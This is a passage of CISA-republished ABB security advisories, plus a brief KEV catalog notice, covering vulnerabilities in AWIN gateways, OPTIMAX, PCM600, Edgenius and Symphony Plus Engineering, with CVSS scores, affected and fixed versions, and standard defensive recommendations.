ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://psirt.abb.com/csaf/2026/4jno000329.json Relevant CWE: CWE-294 Authentication Bypass by Capture-replay Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H CVE-2025-13778 An unauthenticated query allows an attacker to remotely reboot the device, potentially causing a denial of service. View CVE Details Affected Products ABB AWIN Gateways Vendor: ABB Product Version: ABB ABB AWIN Firmware (2.0-0) installed on ABB AWIN GW100 rev.2: 2.0-0, ABB ABB AWIN Firmware (2.0-1) installed on ABB AWIN GW100 rev.2: 2.0-1, ABB ABB AWIN Firmware (1.2-0) installed on ABB AWIN GW120: 1.2-0, ABB ABB AWIN Firmware (1.2-1) installed on ABB AWIN GW120: 1.2-1 Product Status: known_affected Remediations Mitigation The following product versions have been fixed: ABB AWIN Firmware 2.1-0 installed on ABB AWIN GW100 rev. 2 (Product ID: 3BNP102988R1) are fixed versions for CVE-2025-13778 ABB AWIN Firmware2.0-0 installed on ABB AWIN GW120 (Product ID 3BNP103003R1) are fixed versions for CVE-2025-13778 Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://psirt.abb.com/csaf/2026/4jno000329.json Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-13779 An unauthenticated query reveals the system configuration, including sensitive details. View CVE Details Affected Products ABB AWIN Gateways Vendor: ABB Product Version: ABB ABB AWIN Firmware (2.0-0) installed on ABB AWIN GW100 rev.2: 2.0-0, ABB ABB AWIN Firmware (2.0-1) installed on ABB AWIN GW100 rev.2: 2.0-1, ABB ABB AWIN Firmware (1.2-0) installed on ABB AWIN GW120: 1.2-0, ABB ABB AWIN Firmware (1.2-1) installed on ABB AWIN GW120: 1.2-1 Product Status: known_affected Remediations Mitigation The following product versions have been fixed: ABB AWIN Firmware 2.1-0 installed on ABB AWIN GW100 rev. 2 (Product ID: 3BNP102988R1) are fixed versions for CVE-2025-13779 ABB AWIN Firmware2.0-0 installed on ABB AWIN GW120 (Product ID 3BNP103003R1) are fixed versions for CVE-2025-13779 Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 4JNO000329 ABB CYBERSECURITY ADVISORY - PDF Version https://search.abb.com/library/Download.aspx?DocumentID=4JNO000329&LanguageCode=en&DocumentPartId=&Action=Launch, ABB CYBERSECURITY ADVISORY - CSAF Version https://psirt.abb.com/csaf/2026/4jno000329.json. https://psirt.abb.com/csaf/2026/4jno000329.json Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H Acknowledgments Fred Alvarez reported these vulnerabilities to ABB Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely. Revision History Initial Release Date: 2026-04-30 Date Revision Summary 2026-04-30 1 Initial Republication of ABB 4JNO000329 Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to bypass user authentication on OPTIMAX installations that make use of the Azure Active Directory Single-Sign On integration. The following versions of ABB Ability OPTIMAX are affected: ABB Ability OPTIMAX 6.1 vers:all/*  ABB Ability OPTIMAX 6.2 vers:all/*  ABB Ability OPTIMAX 6.3 <6.3.1-251120  ABB Ability OPTIMAX 6.4 <6.4.1-251120  CVSS Vendor Equipment Vulnerabilities v3 8.1 ABB ABB Ability OPTIMAX Incorrect Implementation of Authentication Algorithm Background Critical Infrastructure Sectors: Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-14510 The vulnerability allows an attacker to bypass user authentication on OPTIMAX installations that make use of the Azure Active Directory Single-Sign On integration. View CVE Details Affected Products ABB Ability OPTIMAX Vendor: ABB Product Version: ABB ABB Ability OPTIMAX 6.1: vers:all/*, ABB ABB Ability OPTIMAX 6.2: vers:all/*, ABB ABB Ability OPTIMAX 6.3: <6.3.1-251120, ABB ABB Ability OPTIMAX 6.4: <6.4.1-251120 Product Status: known_affected Remediations Mitigation The following product versions have been fixed:  Ability OPTIMAX 6.3 6.3.1-251120 is a fixed version for CVE-2025-14510 Mitigation For more information see the associated ABB PSIRT security advisory 9AKK108472A1331 ABB CYBERSECURITY ADVISORY - PDF Version (https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF Version (https://psirt.abb.com/csaf/2026/9akk108472a1331.json). https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 9AKK108472A1331 ABB CYBERSECURITY ADVISORY - PDF Version (https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF Version (https://psirt.abb.com/csaf/2026/9akk108472a1331.json). https://psirt.abb.com/csaf/2026/9akk108472a1331.json Relevant CWE: CWE-303 Incorrect Implementation of Authentication Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments ABB PSIRT reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity. Revision History Initial Release Date: 2026-04-30 Date Revision Summary 2026-04-30 1 Initial Republication of ABB PSIRT 9AKK108472A1331 Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to send specially crafted messages to the system node resulting in execution of arbitrary code. The following versions of ABB PCM600 are affected: PCM600 >=1.5|<=2.13  CVSS Vendor Equipment Vulnerabilities v3 4.4 ABB ABB PCM600 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2018-1002208 A vulnerability exists in the SharpZip.dll included in the product versions listed above. An attacker could exploit vulnerability by providing a specially crafted message to the system node, causing insertion, and running of arbitrary code. View CVE Details Affected Products ABB PCM600 Vendor: ABB Product Version: ABB PCM600: >=1.5|<=2.13 Product Status: known_affected Remediations Vendor fix The problem is corrected in the following product version: ABB Protection and control IED manager PCM600 version 2.14. ABB recommends that customers apply the update at earliest convenience. Vendor fix Note: RE_630 protection relays are not compatible with PCM600 version 2.14. When using earlier PCM600 versions with RE_630, the known vulnerability must be mitigated through system-level defenses. For mitigation guidance, refer to the General Security Recommendations. Vendor fix The following product versions have been fixed: Protection and Control IED manager PCM600 2.14 is a fixed version for CVE-2018-1002208 Mitigation For more information see the associated ABB PSIRT security advisory 2NGA002813 ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=2NGA002813&LanguageCode=en&DocumentPartId=pdf&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/2nga002813.json). https://search.abb.com/library/Download.aspx?DocumentID=2NGA002813&LanguageCode=en&DocumentPartId=pdf&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 2NGA002813 ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=2NGA002813&LanguageCode=en&DocumentPartId=pdf&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/2nga002813.json). https://psirt.abb.com/csaf/2025/2nga002813.json Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N Acknowledgments ABB PSIRT reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. This vulnerability has a high attack complexity. Revision History Initial Release Date: 2026-04-30 Date Revision Summary 2026-04-30 1 Initial Republication of ABB PSIRT 2NGA002813 Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to send a specially crafted message to the system node allowing the attacker to install and run arbitrary code, uninstall applications, and modify the configuration of installed applications. The following versions of ABB Edgenius Management Portal are affected: Edgenius Management Portal 3.2.0.0|3.2.1.1 CVSS Vendor Equipment Vulnerabilities v3 9.6 ABB ABB Edgenius Management Portal Authentication Bypass Using an Alternate Path or Channel Background Critical Infrastructure Sectors: Critical Manufacturing, Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-10571 The Edgenius Management Portal in the affected product versions contains a vulnerability that allows authentication to be bypassed. An attacker could exploit the vulnerability by sending a specially crafted message to the system node allowing the attacker to install and run arbitrary code, uninstall in-stalled applications and modify the configuration of installed applications. View CVE Details Affected Products ABB Edgenius Management Portal Vendor: ABB Product Version: ABB Edgenius Management Portal: 3.2.0.0|3.2.1.1 Product Status: known_affected Remediations Vendor fix ABB has prepared an update to fix this vulnerability included in the latest Roll-Up, ABB Ability Edgenius version 3.2.2.0. ABB advises customers to upgrade as soon as possible. Until the upgrade is applied, ABB advises customers to disable the Edgenius Management Portal to mitigate the vulnerability. Vendor fix All affected products: Exploitation requires an attacker to have gained access to the network where Edgenius has been deployed, and while the Edgenius Management Portal is running. Refer to section "General security recommendations" for further advise on how to keep your system secure. Mitigation All affected products: Workarounds are specific measures that a user can take to help block an attack, for example, temporarily disabling the vulnerable feature may remove the exposure with well-known impact on functionality. ABB has tested the following workaround. Mitigation The following product versions have been fixed: Ability Edgenius 3.2.2.0 is a fixed version for CVE-2025-10571 Mitigation For more information see the associated ABB PSIRT security advisory 7PAA022088 ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/7paa022088.json). https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch Mitigation For more information see the associated ABB PSIRT security advisory 7PAA022088 ABB CYBERSECURITY ADVISORY - PDF version (https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch), ABB CYBERSECURITY ADVISORY - CSAF version (https://psirt.abb.com/csaf/2025/7paa022088.json). https://psirt.abb.com/csaf/2025/7paa022088.json Relevant CWE: CWE-288 Authentication Bypass Using an Alternate Path or Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.6 CRITICAL CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Acknowledgments ABB PSIRT reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-04-30 Date Revision Summary 2026-04-30 1 Initial Republication of ABB PSIRT 7PAA022088 Legal Notice and Terms of Use

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.  CVE-2026-41940 WebPros cPanel & WHM and WP2 (WordPress Squared) Missing Authentication for Critical Function Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary ABB became aware of vulnerability in the products versions listed as affected in the advisory. The ABB S+ Engineering product versions are affected by vulnerabilities in PostgreSQL version 13.11 and earlier versions. If an attacker gains access to a site’s S+ Client Server network, they could exploit such vulnerabilities by executing arbitrary code and potentially compromising the entire system. The following versions of ABB Ability Symphony Plus Engineering are affected: Ability Symphony Plus 2.2, 2.3, 2.3_RU1, 2.3_RU2, 2.3_RU3, 2.4, 2.4_SP1, 2.4_SP2, 2.4_SP2_RU1  CVSS Vendor Equipment Vulnerabilities v3 8.8 ABB ABB Ability Symphony Plus Engineering Integer Overflow or Wraparound, Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), Time-of-check Time-of-use (TOCTOU) Race Condition, Privilege Dropping / Lowering Errors Background Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Water and Wastewater Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2023-5869 An attacker running as an authenticated PostgreSQL user can provide crafted data and trigger the integer overflow due to such missing overflow check. This can enable the execution of arbitrary code in the system. View CVE Details Affected Products ABB Ability Symphony Plus Engineering Vendor: ABB Product Version: ABB Ability Symphony Plus S+ Engineering 2.2, ABB Ability Symphony Plus S+ Engineering 2.3, ABB Ability Symphony Plus S+ Engineering 2.3 RU1, ABB Ability Symphony Plus S+ Engineering 2.3 RU2, ABB Ability Symphony Plus S+ Engineering 2.3 RU3, ABB Ability Symphony Plus S+ Engineering 2.4, ABB Ability Symphony Plus S+ Engineering 2.4 SP1, ABB Ability Symphony Plus S+ Engineering 2.4 SP2 Product Status: fixed, known_affected Remediations Vendor fix ABB advises all customers to review their installations to determine if they are using an impacted product as listed above, no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below: - Systems using S+ Engineering 2.2 through 2.4 SP2 should upgrade to S+ Engineering 2.4 SP2 RU1 (re-leased in December 2024) or later. - End users who are unable to install one of these updates should immediately look to implement the Mitigation and Workarounds listed below as this will restrict or prevent an attacker’s ability to com-promise the system. ABB recommends that customers apply the update at the earliest convenience. Mitigation Any exploit of these vulnerabilities would require that the attacker has access to the site’s S+ client/server network. Following ABB’s recommended security practices, including network architecture and perimeter firewall, are mitigating factors in preventing external access to the S+ client/server net-work. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available. Assess the installation specific risk based on this advisory. Use the recommendations described under “Mitigating factors” or “Recommended immediate actions”. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C CVE-2023-39417 If an administrator has installed Extension scripts and specific data is used inside a quoting con-struct, an attacker having proper PostgreSQL privileges can execute arbitrary code in the system as the administrator. View CVE Details Affected Products ABB Ability Symphony Plus Engineering Vendor: ABB Product Version: ABB Ability Symphony Plus S+ Engineering 2.2, ABB Ability Symphony Plus S+ Engineering 2.3, ABB Ability Symphony Plus S+ Engineering 2.3 RU1, ABB Ability Symphony Plus S+ Engineering 2.3 RU2, ABB Ability Symphony Plus S+ Engineering 2.3 RU3, ABB Ability Symphony Plus S+ Engineering 2.4, ABB Ability Symphony Plus S+ Engineering 2.4 SP1, ABB Ability Symphony Plus S+ Engineering 2.4 SP2 Product Status: fixed, known_affected Remediations Vendor fix ABB advises all customers to review their installations to determine if they are using an impacted product as listed above, no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below: - Systems using S+ Engineering 2.2 through 2.4 SP2 should upgrade to S+ Engineering 2.4 SP2 RU1 (re-leased in December 2024) or later. - End users who are unable to install one of these updates should immediately look to implement the Mitigation and Workarounds listed below as this will restrict or prevent an attacker’s ability to com-promise the system. ABB recommends that customers apply the update at the earliest convenience. Mitigation Any exploit of these vulnerabilities would require that the attacker has access to the site’s S+ client/server network. Following ABB’s recommended security practices, including network architecture and perimeter firewall, are mitigating factors in preventing external access to the S+ client/server net-work. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available. Assess the installation specific risk based on this advisory. Use the recommendations described under “Mitigating factors” or “Recommended immediate actions”. Relevant CWE: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C CVE-2024-7348 A ‘time-of-check time-of-use’ (TOCTOU) race condition in a PostgreSQL can allow an attacker to easily execute arbitrary SQL functions by leveraging a PostgreSQL utility often executed with high privileges. View CVE Details Affected Products ABB Ability Symphony Plus Engineering Vendor: ABB Product Version: ABB Ability Symphony Plus S+ Engineering 2.2, ABB Ability Symphony Plus S+ Engineering 2.3, ABB Ability Symphony Plus S+ Engineering 2.3 RU1, ABB Ability Symphony Plus S+ Engineering 2.3 RU2, ABB Ability Symphony Plus S+ Engineering 2.3 RU3, ABB Ability Symphony Plus S+ Engineering 2.4, ABB Ability Symphony Plus S+ Engineering 2.4 SP1, ABB Ability Symphony Plus S+ Engineering 2.4 SP2 Product Status: fixed, known_affected Remediations Vendor fix ABB advises all customers to review their installations to determine if they are using an impacted product as listed above, no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below: - Systems using S+ Engineering 2.2 through 2.4 SP2 should upgrade to S+ Engineering 2.4 SP2 RU1 (re-leased in December 2024) or later. - End users who are unable to install one of these updates should immediately look to implement the Mitigation and Workarounds listed below as this will restrict or prevent an attacker’s ability to com-promise the system. ABB recommends that customers apply the update at the earliest convenience. Mitigation Any exploit of these vulnerabilities would require that the attacker has access to the site’s S+ client/server network. Following ABB’s recommended security practices, including network architecture and perimeter firewall, are mitigating factors in preventing external access to the S+ client/server net-work. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available. Assess the installation specific risk based on this advisory. Use the recommendations described under “Mitigating factors” or “Recommended immediate actions”. Relevant CWE: CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C CVE-2024-0985 An attacker can provide untrusted materialized views and lure a high privileged authorized user to inadvertently execute arbitrary SQL functions by refreshing the attacker's materialized view. View CVE Details Affected Products ABB Ability Symphony Plus Engineering Vendor: ABB Product Version: ABB Ability Symphony Plus S+ Engineering 2.2, ABB Ability Symphony Plus S+ Engineering 2.3, ABB Ability Symphony Plus S+ Engineering 2.3 RU1, ABB Ability Symphony Plus S+ Engineering 2.3 RU2, ABB Ability Symphony Plus S+ Engineering 2.3 RU3, ABB Ability Symphony Plus S+ Engineering 2.4, ABB Ability Symphony Plus S+ Engineering 2.4 SP1, ABB Ability Symphony Plus S+ Engineering 2.4 SP2 Product Status: fixed, known_affected Remediations Vendor fix ABB advises all customers to review their installations to determine if they are using an impacted product as listed above, no further analysis or tools are needed to make this determination. The recommended immediate actions per product are listed below: - Systems using S+ Engineering 2.2 through 2.4 SP2 should upgrade to S+ Engineering 2.4 SP2 RU1 (re-leased in December 2024) or later. - End users who are unable to install one of these updates should immediately look to implement the Mitigation and Workarounds listed below as this will restrict or prevent an attacker’s ability to com-promise the system. ABB recommends that customers apply the update at the earliest convenience. Mitigation Any exploit of these vulnerabilities would require that the attacker has access to the site’s S+ client/server network. Following ABB’s recommended security practices, including network architecture and perimeter firewall, are mitigating factors in preventing external access to the S+ client/server net-work. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workaround No workarounds are available. Assess the installation specific risk based on this advisory. Use the recommendations described under “Mitigating factors” or “Recommended immediate actions”. Relevant CWE: CWE-271 Privilege Dropping / Lowering Errors Metrics CVSS Version Base Score Base Severity Vector String 3.1 8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C Acknowledgments ABB Global reported these vulnerabilities to CISA.  Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Frequently Asked Questions What is the scope of the vulnerability? - An attacker who successfully exploited these vulnerabilities could insert and run arbitrary code in the S+ system. What causes the vulnerability? - It is caused by several vulnerabilities in the PostgreSQL version 13.11 and earlier versions component used by the S+ Engineering product (see Affected products). What might an attacker use the vulnerability to do? - An attacker who successfully accessed the site’s S+ client/server network could cause a denial-of-service situation, corruptions of data or unauthorized disclosure of information. How could an attacker exploit the vulnerability? - To exploit the PostgreSQL vulnerabilities (see Vulnerability severity and details), an attacker should successfully access to the site’s S+ client/server network, remotely (through a wrongly configured or penetrated firewall) or even compromising a local machine and then accessing to PostgreSQL. Recommended practices help mitigate such attacks, see section Mitigating Factors above. Could the vulnerability be exploited remotely? - Yes, see the above How could an attacker exploit the vulnerability? Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. Can functional safety be affected by an exploit of this vulnerability? - Functional safety systems are not affected by these vulnerabilities What does the update do? - The S+ Engineering update removes the vulnerability by installing a secure updated PostgreSQL version. When this security advisory was issued, had this vulnerability been publicly disclosed? - Yes, PostgreSQL 13.11 vulnerabilities have been publicly disclosed. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that S+ Engineering had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 7PAA017341 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and 